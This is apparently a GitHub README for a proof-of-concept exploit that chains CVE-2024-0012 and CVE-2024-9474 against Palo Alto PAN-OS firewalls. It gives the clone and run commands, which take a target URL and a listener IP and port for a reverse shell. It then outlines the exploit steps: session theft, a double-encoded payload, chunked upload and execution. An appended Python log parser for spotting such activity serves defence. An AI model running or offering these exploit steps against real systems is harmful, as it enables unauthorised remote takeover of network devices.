This Proof-of-Concept (PoC) script targets vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474, by automating the exploitation process, including authentication bypass, payload creation, chunked delivery, and seamless command execution.
⚠️ This script is for educational and authorized penetration testing purposes only. Unauthorized use is illegal.
CVE-2024-0012
- Type: Authentication Bypass
- Impact: Enables unauthorized access to administrative interfaces.
- Severity: 🚨 Critical
CVE-2024-9474
- Type: Command Execution & Privilege Escalation
- Impact: Allows remote attackers to execute arbitrary commands.
- Severity: 🔥 Medium
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
- <TARGET_URL>: The target URL, including http or https.
- <LISTENER_IP>: Your IP address for the reverse shell listener.
- <LISTENER_PORT>: The port for the reverse shell listener.
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
Get the full breakdown and technical insights into this PoC from this Medium Write-up!
- 🔍 Checks Vulnerability: Ensures the target is vulnerable to CVE-2024-0012 and CVE-2024-9474.
- 🛡️ Extracts PHPSESSID: Retrieves a session ID for further exploitation.
- ✨ Generates Payload: Creates a double-encoded reverse shell payload.
- 📦 Uploads Chunks: Sends payload chunks to the target server.
- 🔗 Combines Payload: Reconstructs the payload on the target system.
- ⚡ Executes Command: Decodes and executes the reverse shell.
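For defenders, the sequence above (a session obtained from outside the management network, then a run of chunk uploads in that same session) can show up in management-interface request logs as an untrusted source followed by a tight burst of POSTs sharing one session ID. The following is an added detection example, not part of the original PoC; the log record format, paths, session IDs, trusted network and thresholds are all constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Assumption: the only network allowed to reach the management interface.
TRUSTED_MGMT_NETS = [ip_network("10.20.0.0/24")]
BURST_COUNT = 4                       # POSTs in one session ...
BURST_WINDOW = timedelta(seconds=30)  # ... within this window

# Constructed sample records: "ISO-time src_ip method path session_id"
SAMPLE_LOG = """\
2024-12-12T00:03:01 10.20.0.15 GET /ui/page-a s-admin01
2024-12-12T00:03:40 10.20.0.15 POST /ui/page-b s-admin01
2024-12-12T00:04:10 203.0.113.7 GET /ui/page-a -
2024-12-12T00:04:11 203.0.113.7 POST /ui/page-c s-x91
2024-12-12T00:04:12 203.0.113.7 POST /ui/page-c s-x91
2024-12-12T00:04:13 203.0.113.7 POST /ui/page-c s-x91
2024-12-12T00:04:14 203.0.113.7 POST /ui/page-c s-x91
2024-12-12T00:09:00 198.51.100.9 GET /ui/page-a -
"""

def is_trusted(addr):
    return any(addr in net for net in TRUSTED_MGMT_NETS)

def find_alerts(log_text):
    """Return alerts, in log order, for untrusted sources and POST bursts."""
    alerts, seen, reported = [], set(), set()
    posts = defaultdict(list)  # (src, session) -> recent POST timestamps
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts_s, src_s, method, _path, sid = line.split()
        ts, src = datetime.fromisoformat(ts_s), ip_address(src_s)
        if is_trusted(src):
            continue
        if src not in seen:  # any untrusted reach is worth one alert
            seen.add(src)
            alerts.append(("untrusted-source", str(src), ts.isoformat()))
        if method == "POST" and sid != "-":
            key = (src, sid)
            posts[key] = [t for t in posts[key] if ts - t <= BURST_WINDOW] + [ts]
            if len(posts[key]) >= BURST_COUNT and key not in reported:
                reported.add(key)  # report each bursting session once
                alerts.append(("post-burst", str(src), sid))
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(alert)
```

Any "untrusted-source" alert already indicates the management interface is reachable from outside the trusted network, which is worth fixing regardless of whether a burst follows.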
This PoC is intended for educational purposes and authorized security testing only. Unauthorized use of this tool is strictly prohibited. The authors are not responsible for any misuse or damage caused by this tool.